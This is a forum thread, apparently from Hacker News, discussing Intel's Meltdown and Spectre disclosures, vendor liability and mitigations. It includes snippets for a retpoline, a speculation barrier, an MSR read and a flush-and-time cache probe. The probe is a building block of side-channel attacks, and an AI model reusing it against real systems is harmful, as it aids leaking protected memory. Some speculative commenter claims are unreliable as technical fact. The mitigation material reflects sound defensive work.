Intel Issues Updates to Protect Systems from Security Exploits (intel.com)



Why did CERT modify their vulnerability disclosure to remove the text:

> Fully removing the vulnerability requires replacing vulnerable CPU hardware.

Proof: https://webcache.googleusercontent.com/search?q=cache:rzc6iQ...

This smells really bad to me, as if Intel pressured CERT into removing language that could have caused their market value to instantly vaporize as every consumer for the last 20 years joins a class action suit...


Try the Wayback Machine instead of Google's web cache, as the latter isn't showing the original.

Here's the vulnerability note stating to replace hardware on 01/04/2018 at about 1800 GMT: https://web.archive.org/web/20180104032628/https://www.kb.ce...

Then here is the same page with the replace verbiage removed on 01/04/2018 at about 1900 GMT: https://web.archive.org/web/20180104180023/https://www.kb.ce...


People were mocking them for it on Twitter, and one of the researchers (Anders Fogh [0]) called it "funny". It could just be that people were misled into believing that such hardware currently exists, and that CERT decided there would be less confusion if it stuck to currently possible mitigation techniques. :)

In any case, I doubt Intel would pressure anyone to remove the generic imperative "buy a new CPU".

[0] https://twitter.com/anders_fogh/status/948904282568392704


>> Fully removing the vulnerability requires replacing vulnerable CPU hardware.

Imho Intel would much rather CERT keep this language, which is why it was removed. There is no drop-in non-Intel replacement for an Intel CPU. Telling everyone that they need to replace CPUs is basically a mandate for them to buy whatever replacement Intel can cobble together. Having to replace all those chips would see Intel's stock price skyrocket. The reality is that chips don't need to be replaced ASAP and customers have time to perhaps choose non-Intel chips.


I suppose it would only make the stock price rocket if it wasn't decided in some class-action suit that Intel has to replace the CPUs for free.


"have time" ? I have a feeling of hurry because the vulnerabilities are so "easy" to exploit that attacks are probably already occurring.


That doesn't make any sense. Do you think when Takata had to recall all those defective airbags that were killing people their stock price jumped because they were able to sell replacement airbags?

A product manufacturer with serious defects almost always ends up eating the costs of hardware repair or replacement.


It could just be that the statement is incorrect or misleading.


Yes. Spectre2 can be and is being patched with a microcode update that partially disables branch prediction.


A microcode update which most users won't get... :/

https://news.ycombinator.com/item?id=16072604


What about meltdown?


Meltdown is mitigated by kernel page table isolation. See the patch notes / the attack paper.


That says nothing about the need to fully replace defective hardware to avoid the hardware problem.


That says nothing about the possibility of patching the missing page table isolation with a microcode update. They have enough spare registers for a separate CR3, so they could work around the TLB flush. Since the FDIV bug, HW problems are not HW problems anymore.


I don't get these calls for a class action suit... If it were intentional, there could be a reason. But I just don't get this attitude when they are having a really bad day after someone discovered a new type of attack on their chips.


Intel isn't having a bad day. The people who are stuck with chips that enable severe security exploits are having a bad day. Actually they are going to have a bad year till the design flaw is fixed in hardware. Or maybe even 5 years. Who knows.

Intel is 100% liable to face a lawsuit over this. Consider if a major car brake manufacturer discovered that there was a design flaw in the brakes that prevented them from functioning in certain situations. It'd be facing multiple lawsuits by now, whereas Intel is going with the "our chips are the most secure ever" line.


I think you are confusing security and safety. Security is about dealing with malicious attackers, while safety is about making sure random events and mistakes won't kill you.

Your example with the brakes is about safety, i.e. making sure the car won't kill you during normal operation. Normally, unless their CPUs start bursting into flames, this is not a problem for Intel.

The problem here is about security. A car analogy would be that to start your car, you need a code and that code can be found by measuring how long it takes to process the input, making life easier for thieves.

As for liability, I don't think you can be liable in court if you didn't plan for something that wasn't known at the time and isn't trivial.


Ironically, isn't your analogy a literal thing?

http://www.bbc.co.uk/news/business-41367214


> As for liability, I don't think you can be liable in court if you didn't plan for something that wasn't known at the time and isn't trivial.

Engineering brakes that work reliably over months and years of use isn't trivial.

Process isolation and kernel security issues have been known for decades and have been fundamental design requirements for decades.


The car analogy is a very good one. The infamous Samsung Galaxy Note 7 also comes to mind. I agree that such a security hole warrants a replacement.


I don't believe the car analogy is good. And neither is the Note one.

In both of those cases the products can cause serious harm without any third party being involved. The brakes would just fail or the battery would explode during normal use.

However, in the Intel case there has to be an attacker that actively exploits an issue in design.

To me this would be like making a class action suit against all lock vendors because they can be bypassed with the right set of tools. The fact that this affects everyone (Intel more than others) and that it took 10 years to find grants them some excuse. Also the architecture is not secret as far as I know so anybody could have audited this. They most probably did do so and found nothing until now.

Now, I do not like Intel communication around this and if it comes out that they knew this for years and decided to sit on it then it would be a different story.

Class action lawsuits are useful when there is negligence, or bad intent but in this case what could it possibly solve?


> In both of those cases the products can cause serious harm without any third party being involved.

Sorry, but in the 21st century world of the internet, cracking needs to be taken as a given. In many cases, "normal use" for a computing product means exposing it to use and therefore potential attack from anywhere on the internet. CPUs certainly fall into this category.


Legal liability for damages due to defective products isn't premised on the defects being intentional.


You don't have to inflict intentional injury to be liable for something like this. Intel's customers aren't getting what they paid for, so it seems pretty reasonable for the company to compensate them.

If you bought a car that was advertised as having 300 horsepower, and then the manufacturer realized it was unsafe unless they made a software change limiting the horsepower to 200, wouldn't you expect some compensation?


The window from time of purchase to time of knowledge of the flaw gives a time frame for filing lawsuit(s).

Example: Intel rushed out product to compete against AMD's Threadripper. That work happened after the issue was known. Thus Intel was investing in continued bad practices and selling known-bad products instead of investing in fixing the hardware flaw.

A major flaw in a car prevents selling that car until the flaw is fixed. Why shouldn't this also apply to the computers that run the cars and other products?


> I don't get these calls for a class action suit... If it were intentional, there could be a reason.

You don't think people should be able to sue for negligence?!?


If responsibility is written down and it says they produce unbreakable hardware, then yes.

If they don't do anything after finding out about the vulnerability - probably; it depends, I don't know.

But they are clearly putting in effort with vendors to mitigate and solve the issue. That doesn't look like negligence to me.


AMD/ARM/Intel CPUs are affected.


...by the much-harder-to-exploit timing attack that is easily mitigated by cropping timer resolution.
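
("Cropping" here just means rounding timestamps down to a coarse granularity, roughly what browsers did to performance.now() after disclosure. A minimal sketch of the idea in C; the 20 microsecond granularity is an arbitrary illustrative value, not any particular vendor's choice:)

    #include <stdint.h>
    #include <time.h>

    /* Return a monotonic timestamp in nanoseconds, rounded down to a coarse
       granularity so it is too blunt for cache-line timing. 20 us is an
       illustrative value only. */
    static uint64_t coarse_now_ns(void)
    {
        const uint64_t granularity_ns = 20000;
        struct timespec ts;
        clock_gettime(CLOCK_MONOTONIC, &ts);
        uint64_t ns = (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
        return ns - (ns % granularity_ns);
    }

As the reply below points out, this alone isn't a complete fix, since an attacker can build a higher-resolution clock of their own (e.g. a counting thread).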


That is not an effective mitigation.


It looks like they expose some MSR to control the branch predictor, see:

https://twitter.com/aionescu/status/948753795105697793

https://twitter.com/aionescu/status/948818841747955713
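
For anyone who wants to check whether their microcode exposes it, here's a hedged sketch that reads the new MSR through Linux's msr driver (needs `modprobe msr` and root). The MSR number 0x48 for IA32_SPEC_CTRL is taken from the documentation circulating now; verify it against Intel's own docs before relying on it.

    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        const uint32_t IA32_SPEC_CTRL = 0x48;   /* bit 0 = IBRS; number per current docs */
        int fd = open("/dev/cpu/0/msr", O_RDONLY);
        if (fd < 0) { perror("open /dev/cpu/0/msr"); return 1; }

        uint64_t value;
        /* The msr driver uses the file offset as the MSR index; a missing MSR
           (old microcode) shows up as an EIO read error. */
        if (pread(fd, &value, sizeof value, IA32_SPEC_CTRL) != (ssize_t)sizeof value) {
            perror("rdmsr IA32_SPEC_CTRL");
            close(fd);
            return 1;
        }
        printf("IA32_SPEC_CTRL = %#llx\n", (unsigned long long)value);
        close(fd);
        return 0;
    }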


It appears the retpoline fixes don't work in Skylake or later (it's smart enough to speculate out of it?) and will require new support for IBRS/IBPB in the microcode to mitigate.

From: https://lkml.org/lkml/2018/1/4/615
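
For reference, the retpoline trick replaces an indirect jump with a call/ret pair that traps the speculative path in a harmless loop. A sketch of the pattern as publicly described, for a target address held in %r11 (real compiler-generated thunks may differ in detail, and per the lkml thread above this apparently isn't sufficient on Skylake+):

    /* Sketch of a retpoline thunk replacing `jmp *%r11` (x86-64, AT&T syntax). */
    __asm__(
        ".globl retpoline_r11_sketch\n"
        "retpoline_r11_sketch:\n"
        "    call 2f\n"            /* pushes the address of 1: and jumps to 2: */
        "1:  pause\n"              /* speculation predicted to 'return' here spins harmlessly */
        "    lfence\n"
        "    jmp 1b\n"
        "2:  mov %r11, (%rsp)\n"   /* overwrite the saved return address with the real target */
        "    ret\n"                /* architecturally jumps to *%r11; the RSB predicts 1: */
    );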


What I don't understand is why the kernel patches and microcode updates are still being worked out today. They had 6 months to work on it.

No secret channel to communicate with Linux Kernel developers? No coordinated effort? Last minute findings?

In this thread https://lkml.org/lkml/2018/1/4/174 it looks like the author is disclosing the info at the last minute.


I was wondering the same thing earlier. This doesn't feel like a disclosure that's had anywhere near ~6 months put into it.

Did the vendors ignore the disclosure initially and begin to change tactics later in the game? Based on how certain vendors have been characterizing this in their PR, I wouldn't be surprised if they didn't take the problem seriously originally.


The Ubuntu page that was on HN earlier [] claims that they were notified in early November. I have no idea if kernel people (as opposed to distro people) got notified earlier.

[]: https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAn...


Especially microcode updates. Microcode is just a giant obscure binary to everyone outside of Intel. If a mitigation was possible via a microcode update, it could have been published months before disclosure without any meaningful risk.


IIRC Intel employs people to work on the Linux kernel on behalf of Intel. Either Intel fumbled, or it isn't that easy to circumvent the problem plaguing Intel's processors with a software hack.


Or, they were holding out hope for a workaround that didn't make the entire Cloud 20% slower and they couldn't make it work.


Code for the solution and then code for performance. Direct performance coding is a bad return on investment.

First prove it works and then prove it can be made better and faster ...


That’s easy for you to say. You’re not the person having to admit to a billion dollar mistake.

Everybody stalls for time when the stakes are this high. How long can I reasonably spend trying to turn this into a small problem before I have to go public with it?

Saying it’s a bigger problem than it turns out to be is a PR nightmare of its own. If there was a cheap fix then you cried wolf and killed your reputation just as dead.


Exactly this. Apparently, the details of the attack were published in official paper(s) before the security teams of major OSes could prepare and make mitigating patches publicly available to users. There is no patch for Debian 8.0 (Jessie), or for Qubes OS, for example.

The chatter is all about how CPU manufacturers screwed up, but there is a much more alarming issue here, I think: the apparent irresponsibility of the people who published the flaws before the security teams and the users could mitigate them. Perhaps there was a reason for accelerated public disclosure, but so far this makes no sense to me.


Seems that the new MSR results in worse perf than the retpoline, which is alarming. https://docs.google.com/document/u/2/d/e/2PACX-1vSMrwkaoSUBA...


Interesting:

> Note: IBRS is not required in order to isolate branch predictions for SMM or SGX enclaves

Perhaps this microcode update exposes a feature which was originally to protect these two modes? But that would mean that Intel did think about leaks through the branch predictor, only didn't make the logical leap that this could be an issue also for normal ring0/ring3...


Huh, so did Intel know about this vulnerability when they designed SGX?


Maybe, maybe not. I looked around a bit and found [1]"that the Intel SGX does not clear branch history when switching from enclave mode to non-enclave mode", which suggests either that the SGX designers were unaware of the dangers of not separating branch prediction between privilege levels, or that Intel intentionally weakened SGX so as to not reveal the similar flaw in their ring0/ring3 separation.

1: https://arxiv.org/abs/1611.06952 (Nov '16)


Intel says Broadwell or newer: https://newsroom.intel.com/wp-content/uploads/sites/11/2018/... (page 5)


I'm disheartened by the number of commenters here taking the stance that Intel has idiot designers or that management doesn't care about security. This attack is very clever and unexpected. Even though side-channel attacks have been talked about for a while, even the guy who developed Meltdown was surprised that it worked. It just seemed like an "in theory" security hole, not an exploitable one.

AMD isn't vulnerable to Meltdown not because they foresaw this issue, but probably because they simply weren't as aggressive as Intel in allowing speculative execution. For years people have preferred Intel over AMD CPUs due to their performance advantage, due in part to the higher sophistication of their pipeline.

Or to recast it, nobody is hating on AMD right now, but AMD CPUs do allow a user process to learn some things about the kernel via timing attacks. If next month a researcher develops Meltdown2 for AMD, are AMD's designers now suddenly idiots for missing an obvious security hole?


> AMD isn't vulnerable to Meltdown not because they foresaw this issue, but probably because they simply weren't as aggressive as Intel in allowing speculative execution.

You don't see why being "aggressive" with speculatively loading data across a _protection boundary_ could be considered irresponsible? I, for one, think AMD has the right to gloat if they want. And it's not just AMD; besides the latest version of ARM, it seems all the other CPU vendors decided not to be "aggressive" with their users' protected data (SPARC, MIPS, AMD, POWER, s390x).

Does it mean all those vendors and architects had PoC for years for this and were sitting on it? No but they could have had a hunch not to go that route. Just like a sane developer might have a hunch over opening a wide API surface to a server that contains sensitive data. It doesn't mean they know there is security vulnerability in one of the API endpoints, it's just sane practice.

> If next month a researcher develops Meltdown2 for AMD, are AMD's designers now suddenly idiots for missing an obvious security hole?

But who called any developers idiots here? I think you were the only one.


Side channels are really hard to protect against. Caches, buffers (maybe you can check when they are full), branch prediction, sound, vibrations, timing, electricity consumption, em waves, temperature. Things leak all over the place.


Such bullshit - there are loads of people, maybe not on SO, but on reddit etc., who called them "idiot CPU developers", possibly misinterpreting what Linus said.


Someone on the internet is mean, I have no doubt. I haven't seen a lot of name-calling here. Let's stick to HN and let reddit deal with its own drama.


Why not just chalk this up to Dunning-Kruger and then move on to some other, more interesting/productive use of attention?


> I'm disheartened by the number of commenters here taking the stance that Intel has idiot designers or that management doesn't care about security.

I think you are being unfair, as the GP didn't call anybody an idiot for not caring about security.

It just calls them out for insisting that this is not a flaw or a bug.


I think it makes sense in a really pedantic way: "flaw" and "bug" have always been, in my observed experience of usage, terms used to refer to the consequences of oversights.

This wasn't an oversight; this was more like... whatever you call the fact that we're still, today, choosing to employ (and even design new!) hash functions that quantum computers could probably break easily. We're making an intentional design choice, based on the perceived difficulty and current infeasibility of a particular known class of attack against that design. That current hashes are vulnerable if-and-when a quantum computer comes along to crack them isn't really a "bug" or a "flaw" in our hashing algorithms; it's a known property of our hashing algorithms.

Or, for another analogy: there was a point in history when the peak of warfare was ships shooting guided missiles at other ships, and the targeted ships shooting smaller "countermissiles" that attempted to get in the way of the incoming missiles before they could hit anything important. Every missile had a faint heat signature, making it visible to infrared optics—this was an unavoidable consequence of the fact that missiles need engines to make them move. But for a long time, the idea of a heat-seeking countermissile was just infeasible or un-economical to implement, so little work was done to hide the emissions signatures of missiles. The emissions signature certainly wasn't a "bug"—it wasn't the result of an oversight; and it's a bit strange to call it a "flaw", insofar as there was no such thing as a missile that didn't have said "flaw" while still being a missile. It was a known property of the missile technology of the time. Or, if you want to think of it on a higher level, "missiles" themselves—anything that you might call a missile—had a categorical flaw.

In the same way, anything we might call a modern-day CPU is now known to have the categorical flaw of leaking at least some amount of information through speculative execution. You can minimize it (like you can minimize a missile's heat signature), but you can't get rid of it without making something we wouldn't even call a CPU any more (most things without speculative execution are, these days, considered microcontrollers.)

In that sense, I can understand Intel's insistence that they didn't make a flawed product: they made a perfectly good instance of a "computer processor"—it's just that "computer processors", as a category of product, have a problem.

You wouldn't blame the missile manufacturer for making missiles with visible emissions signatures, before heat-seeking countermissiles were invented. They didn't introduce a flaw. They made their product to order, and the order—the requirements, the demands of the customer—themselves contained the flaw, contained the supposition that it was okay to make a particular trade-off because it wasn't currently exploitable.

In the missile manufacturer's case, it was the government that said "sure, heat doesn't matter, just make it go fast"; and when heat-seeking countermissiles were invented, it was the government whose (lack of) intelligence foresight was to blame for not changing their requirements to anticipate that exploit.

In Intel's case, some customer could have foreseen the exploit and shifted the market toward demanding non-speculative-execution CPUs. Intel was just making what the customers asked for, and right up until the end, they were asking for the categorically-flawed product.


Design choices don't need patches to fix them. Flaws and bugs do.

You seem to think that this issue is inherent to speculative execution - it is not. It is due to intel performing speculative execution in a flawed way. In particular, an incorrect branch prediction should have no detectable effect on the system, whereas here it does.


> an incorrect branch prediction should have no detectable effect on the system, whereas here it does

Branch prediction is not scoped for that. Branch prediction will always change microarchitecture state, which is always detectable at some level or another. The key takeaway for designers should be that even though microarchitecture state is not exposed in the datapath it is not secured from side channel exposure.


Your argument seems reasonable, until we bring to the table all the shit that Intel did to beat AMD out of the x86 market. Those deeds came from their marketing department, so no relation to chip design per se, but as a company they were still actively trying, and nearly succeeding, to kill any diversity in the x86 market.

It’s basically like saying “we are building stuff customers wanted, we just also beat to death any other potential alternative they could want as well”


You sound like a lawyer, and I don't mean that as a compliment. But alright: if this isn't a flaw, then breaking it wasn't an achievement, and by that logic quantum computation wouldn't be an achievement either - or rather, foreseeing and avoiding its consequences wouldn't be, which is easier here because of the different time scales, but still.


The researchers were surprised that it worked because it shouldn't have worked.

I don't think Intel's engineers are incompetent, but be careful about the reasoning you're using.


The problem is that there are a lot of us trying to get people to take these "completely unlikely" attack vectors seriously. It's like talking to a dog or a wall. Too many humans are hardwired to respond only when confronted with an actual situation. We get frustrated because our "in theory it works..." attacks work in reality eventually and then the rest of the world is all "oh who could have predicted that ____".

We did. We, the people you called "paranoid" while we quietly try to fix things. We're the ones trying to make sure that people don't die when cyber vulnerabilities are exploited by shitty actors.


I've encountered this, with great unhappiness.

I have a theory that this heavily relates to the feedback loops and signals in play. New features are positively observable and their impact is observable from release onwards.

When defending against unknown unknowns, security is unobservable. It's observable only in its absence. All that's left are heuristics and synthetic signals like pentesting.

I wrote a multi-thousand word essay on the topic, but for an internal audience. I don't know if I could properly share it.


Yes, that's exactly right, and it's why it's hard to sell "security" and how we end up with a voluminous x86 ISA.

My own speculation is that we got here in this industry through a complete absence of liability. Bugs are not a big deal; they are _expected_ now.

The only counter example I know of is Knuth's bug reward system.


Please do share if you can, I've been thinking a lot about this topic in context of ops / "janitorial" work in general.


AMD did things the right way competing for performance without sacrificing security. What's happening right now are the consequences of Intel's actions.


AMD did things the "right" way, not because they understood the security implication, but because it was very hard to achieve such high level of speculation, and I think the performance gains didn't justify the effort for them.


Have you got a reference for that statement? Because my interpretation of what has been said so far is that AMD deliberately chose not to allow speculative dependent loads that crossed privilege boundaries by enforcing permission checks on all reads whereas Intel chose to permit all loads & rely on the fixup at the retirement stage of the pipeline to enforce privilege boundaries.

Happy to be proven wrong however.


I don't have hard evidence, but

A) they are vulnerable to two out of the three attacks, which indicates they did not in fact consider speculative execution a danger

B) it is hard to believe that if they researched the topic at AMD, they wouldn't find this vulnerability in Intel processors a long time ago


I note in passing that the AMD processor manual is explicit that all reads are checked against the privilege bit before being issued.

It’s this protection that means that AMD processors are not subject to meltdown.

All CPU manufacturers appear to have been caught on the hop by Spectre (branch prediction history side channels).


They did across privilege boundaries, which was the point.


How do you know this?

I think it's worth noting that it's entirely possible that, if you are a CPU execution pipeline designer, you think about memory loads/stores, L1 cache, branch prediction and speculative execution, and it occurs to you that the cache gets polluted by speculative execution and that the branches can be security checks.

But the solution is simple. If the branch is important, wait for it. (Load it into L1 cache before the branch - use a memory barrier.)
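
Concretely, "wait for it" looks something like putting a serializing barrier between the bounds check and the dependent load, which is roughly what the published guidance for this pattern recommends. A hedged sketch (table/table_size are placeholder names):

    #include <immintrin.h>   /* _mm_lfence() */
    #include <stddef.h>
    #include <stdint.h>

    extern uint8_t table[];
    extern size_t  table_size;

    /* The lfence keeps the CPU from speculatively issuing the dependent load
       with an out-of-bounds index before the bounds check has resolved. */
    uint8_t load_checked(size_t untrusted_index)
    {
        if (untrusted_index < table_size) {
            _mm_lfence();                    /* speculation barrier */
            return table[untrusted_index];
        }
        return 0;
    }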

The fact that this is not in any ISA docs is a likely pointer toward the possibility that it in fact hadn't occurred to them.

These attacks are the same as any new invention. Easy to see once you've grasped the concept.


I think you are missing the point. What the commenter is saying is this... right now you are saying AMD did things the right way, but if a loophole is exposed next month, will you say the same thing?

I'm neither supporting nor refuting the commenter. Just explaining to you the meaning of the comment.


If AMD spotted the issue and avoided it deliberately all those years ago, why didn't they tell anyone?


There is a difference between following good security practices (gratuitous isolation, defensive design) and having exploits ready to show the world how valuable it is. No one was claiming AMD knew of such exploits beforehand.


What are you even arguing here?

If I observe fact X which is "bleeding obvious", then it's not my responsibility to tell the world about X.

Of course this stuff isn't "bleeding obvious", but I'm going to assume that the AMD engineers thought it was "obvious enough" not to explicitly tell the world about it.

Besides... do you have any idea what kind of NDAs those engineers are going to have to sign?


Because they knew it was an obvious security risk?


Perhaps whoever thought about it assumed it was obvious enough that others would have realized it as well. It may simply have never occurred to them that it was worth sharing.


Intel grabs tens of billions in revenue year after year; people of course expect the best of the best from them. Playing the victim doesn't work when you are the industry leader. You cannot have your cake and eat it too.


The latest AMD processors are on par with Intel in terms of IPC; there is no evidence that AMD's pipeline design is any less smart than Intel's. AMD processors do not have the issue because they don't speculatively load data across the defined boundary. It is _NOT_ an "in theory" security hole; it is a security hole that managed to lower the computing performance of the entire world due to Intel's market share.

Intel designers should of course be blamed for such issues - full-price-paying customers are now suffering performance penalties of up to 30% on some workloads, when each new generation of Intel processors has given only a 5-10% performance boost over the last 5-10 years. Sure, the issue is a surprise for everyone, but if they are designing processors to power billions of devices, they are expected and required to be exceptional.

Let's make it perfectly clear - Intel designers don't have to be smarter; they can give up their market share to AMD. It is a privilege to design chips for the entire world, not a right. When things go wrong, they need to admit the mistakes and fix their crap; sadly Intel is putting too much effort into its PR rubbish ATM.


Meltdown could have been avoided by following what is in CPU design text books about speculative execution.

Spectre is clever. Meltdown, as known today, is (mainly) a major Intel fuck-up.


The poster you responded to never said that Intel engineers are idiots. Intel made a huge hole for themselves in the way they implemented ME.

The reason for the strong reaction over these flaws is not the severity of this issue, nor does anyone believe Intel engineers are idiots. They are getting blowback because they implemented a closed solution for a powerful feature - the Management Engine.

They lost a lot of trust, which makes it far harder to recover when new issues occur.


Did Intel promise in their docs that side channel attacks are not possible? If not, then OS writers are equally to blame for making incorrect assumptions. I don't think this is Intel's fault alone.

On a grander note, there are probably hundreds of even more esoteric side channel attacks all across the system since every process changes the system state. This is more like the beginning of a new style of attacks now that one is shown to be practical, rather than any particular entity's fault. Hardware designers will need to consider informational and physical isolation in a more rigorous way, and there may be theoretical limits that bound the performance-security tradeoff when you share resources.


They do not. And, more problematically for the "it's all Intel's fault" story, in the SGX documentation they explicitly state that their chips do not protect against side channel attacks and that it's up to the software developer to handle it. As SGX is effectively part of the CPU, that means their official chip docs rule out side channel protection as a feature.

I don't know if playing the blame game here is going to be productive. All CPUs are vulnerable to side channel attacks of various kinds and focusing on Meltdown specifically seems like missing the forest for the trees - especially as ARM has the same issue in some of their designs.


meta comment - but when I first saw this comment it was in reply to carwyn's top level comment but now it is a top level comment unto itself? that makes a lot of the replies not make sense now - was this comment moved?


Well the first problem is obvious with hindsight. Consider all the state changes that occur when an instruction is speculatively executed. Are any of these rolled back?

In this case, the cache is not being rolled back. Neither (presumably) is the branch predictor. And then what of the performance counters? (do they count if an instruction is not retired?). I see many potential attack vectors opening up and it's much harder to prove that any of these state changes can't be exploited.


I mean... yes?

Why would it be any different?


I disagree. The attacks are clever in focusing on speculative execution, but are otherwise fairly simple (timing attacks are well known). I'm surprised such attacks have not been discovered earlier, as speculative execution seems quite broken. Security is likely not a top priority for Intel and probably not something their verification teams are targeting. There is perhaps a gap in the market for a vendor focusing on secure CPUs.


For an architecture that has been around for so long, if the attack was only discovered recently, then is it fair to call it 'simple'? In retrospect, anything can be obvious.


We don't know when it was discovered first though. We only know that it's been disclosed now.


An obvious flaw doesn't become less obvious just because it has already been found. So it might be that some blackhat knew about it before, but there are a lot of smart, sufficiently-pale-shade-of-gray people out in the world for obvious problems to be found in less than decades. So I don't think it's an obvious problem.

It seems that at least some ARM might be affected by both Spectre and Meltdown.

So far, I have only seen negative meltdown tests for older AMD cores. Is there anything known for Ryzen except for the PR by AMD (and the kernel patch, which might be based on the google project zero information about older AMD cores)?

While meltdown is "easy" to fix by not reading memory if unprivileged to do so, spectre is a lot harder. Even if the caches are made safe, for example by having "speculative" cache lines which will be renamed into the "true" cache when the speculative thread is actually accepted and retired: It's not the only place where there is hidden state. For example, the branch prediction might be affected, and might give a timing signal.


From [1]:

> We reported this issue to Intel, AMD and ARM on 2017-06-01.

I don't think they have been twiddling their thumbs with such a huge discovery without informing the manufacturers.

[1] https://googleprojectzero.blogspot.com/2018/01/reading-privi...


We know (or can guess) approximately when the project zero team discovered the issue, but I think your parent comment meant that we don't know when _someone_ discovered it first. Maybe the project zero team were the very first to discover it, or maybe some state actor discovered it a decade ago and has been using it since then.


Right - but as always with a vulnerability, especially one that's borderline-undetectable through any kind of log analysis, the question becomes "were Google really the first to think of this?" and the tinfoil kingdom builds itself from there.


It's simple to describe, and all the pieces are big red flags even on their own: speculative execution has side effects (e.g. the cache is not rolled back), speculative execution omits security checks, and timing attacks can be used to determine what is in the cache. It can even be exploited using JavaScript; no hand-crafted CPU instructions required.
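
The timing piece really is that small. A hedged sketch of the "is this line cached?" primitive on x86 (thresholds are machine-specific, and rdtscp/clflush are of course x86-only):

    #include <stdint.h>
    #include <stdio.h>
    #include <x86intrin.h>   /* _mm_clflush, _mm_lfence, __rdtscp */

    /* Time a single load of *p in TSC cycles. */
    static uint64_t time_load(volatile uint8_t *p)
    {
        unsigned aux;
        _mm_lfence();
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        uint64_t t1 = __rdtscp(&aux);
        _mm_lfence();
        return t1 - t0;
    }

    int main(void)
    {
        static uint8_t probe[64];
        _mm_clflush(probe);    /* evict the line: the first load should be slow */
        printf("uncached: %llu cycles\n", (unsigned long long)time_load(probe));
        printf("cached:   %llu cycles\n", (unsigned long long)time_load(probe));
        return 0;
    }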

Perhaps it took so long to find because it's only relatively recently that companies have been paying people to break the hardware?


There are still a lot of simple attacks yet to be discovered. In SW and in HW designs.


> AMD isn't vulnerable to Meltdown not because they foresaw this issue, but probably because they simply weren't as aggressive as Intel in allowing speculative execution

What do you mean by 'aggressive' here? Cause frankly, I think aggression isn't a good trait to be exploiting in business - it's not the same as competitiveness.

Is it 'they would have done this if they could but they didn't try hard enough', or is it 'they could have done this but didn't have the nerve to take the risk'?

In the latter case, I'd argue that a lack of willingness to trade off security against performance is a Good Thing in line with engineering ethics. In the former case, it seems like you're assuming business competition is always construed as a zero-sum game - is this correct?


They weren't making a trade-off because it was not a known risk. No one had any reason to think that speculative jumps would lead to a large security hole.


My understanding is that it was a known risk; see the various citations already provided throughout this thread. Meltdown is a flawed design decision because it failed to consider the consequences of asynchronously verifying permission for speculative executions that reach into kernel space, which allows the Spectre attack to affect kernel memory too. That's the limitation of the reach of the "Intel bug" as far as I know; the rest is generally applicable.

The Spectre attack is a side effect of performing speculative execution without wiping caches, something that was, until yesterday, an intentional and clearly-chosen industry design direction, standard across almost every commercial CPU produced in the last 20 years, despite the known risk of "theoretical" timing attacks.

The only reason for Intel to make the decisions that led them to be vulnerable to Meltdown was to sacrifice correctness/safety for performance, and failing to consider the potential side effects of that sacrifice (cache heat). They obviously made a bad risk tradeoff there (though I don't necessarily fault them).

AMD could definitely make the argument that Meltdown was an irresponsible "benchmark cheat" from Intel.

EDIT: And let me further clarify, ARM was "cheating" and doing the permission check asynchronously on some models too (i.e., some of their chips are also vulnerable to Spectre in Kernel-space aka Meltdown). It's not solely an Intel issue.


Speculating memory reference reads across security boundaries is not a trade-off (except if you can prove that you will not further act on them in any data-dependent way that is observable). That's mostly common sense.

Spectre does not need that -- but OTOH is more difficult to exploit; it is in a whole different category. There is a reason they have different names.


This seems to be subject to debate...


They are still sticking to this line:

"This is not a bug or a flaw in Intel products. These new exploits leverage data about the proper operation of processing techniques common to modern computing platforms, potentially compromising security even though a system is operating exactly as it is designed to."

https://www.intel.com/content/www/us/en/architecture-and-tec...


It's like we spent 20 years building houses out of wood, and then suddenly someone discovered fire. "This is not a flaw in Intel lumber supplies. This new 'fire' leverages chemical properties common to all plant products, potentially compromising structural integrity even though the lumber is operating exactly as it was designed to."

(Edit: It seems this analogy may be overly kind to Intel. Read all the replies to this comment for more information.)


> and then suddenly someone discovered fire

This is not really like that. The dangers of speculative execution were known before, and, separately, the processor itself provided memory isolation capabilities. That the processor would ignore its own memory isolation principles when speculating about the next instruction to execute is a critical base of these vulnerabilities.


So maybe a better analogy would be that they built fire retardant layers into buildings, but neglected the fact that heat could still pass through the layers and start fires on the other side without burning the layer itself?


The asbestos is working as intended as insulation/fire retardant. Sorry 'bout the mesothelioma.


This one's good, because, like asbestos, there's not really a good alternative to this on current platforms other than giving up some of the performance value of branch prediction in exchange for long-term safety. As far as I know, asbestos remains an unparalleled material for fireproofing, and it is still used sometimes under controlled conditions, even though we've been forced to accept other materials for general use.


AFAIK, mineral wools and silica fabrics have replaced much of the high temperature insulation that asbestos used to do. I believe they do the job just as well, but they're more expensive because they're manufactured rather than mined.


A better analogy would be that they presented specs showing that the building was supposed to be fireproof, but still insisted on diverging from the specs and building best practices by cladding it with highly flammable material to improve its thermal performance.

Now Intel has its own Grenfell Tower.


Unlike "neglecting the fact that heat could still pass through the layers", speculative execution doesn't merely allow something that was previously possible. It allows something that was previously impossible, and while doing so undermines another, more critical, feature of the processor.


Stop trying to make the analogy fit. It's not a good analogy.


Wouldn't a good analogy rather have the effect of rationalising what's already ridiculous?


They made the wood fire retardant but it still burns - just not as easily as untreated wood - while selling it as fireproof wood.


Ad absurdum: it's as if they advertised the home as being more efficient, faster to heat, and less wasteful thanks to a lucky quirk of their furnace design that runs beyond specification, so that instead of overheating one room or needing expensive distribution, the furnace gets you really quick hot water and the excess energy isn't wasted. Compared to fully internally insulated homes, the benefits just keep adding up - e.g. installing plenum cable would be inefficient because this system dumps the excess heat quickly through the house, the ability to convect nicely preventing past occurrences of furnace fires. To be the most efficient inhabitant (kernel process), Intel recommends you enter and exit the over- and under-heated rooms frequently to manage your body temperature. This design is excellent for your hyperactive residents; please refer to our release notes for the use of rooms either exclusively or during long operations such as Netflix consumption.


If this analogy were apt, I think I would be on their side - but we're talking about "wood" they designed, and the "fire" is not some new phenomenon but an actual thing they've supposedly designed against (unauthorized access of memory). [From my reading as a lay person; please let me know if this is incorrect.]


The analogy is a bit tortured, but in this case both companies build houses out of wood because it has the best performance, and both cover them with fire retardant materials. One company discovered that they could make better houses if the fire retardant material was held on with glue instead of screws, but failed to account for the fact that the fire might melt the glue.

Probably best to just defenestrate this analogy.


I didn't know you could defenestrate abstract things. I thought it was just for people.


Anything can be thrown out a window!


> It's like we spent 20 years building houses out of wood, and then suddenly someone discovered fire.

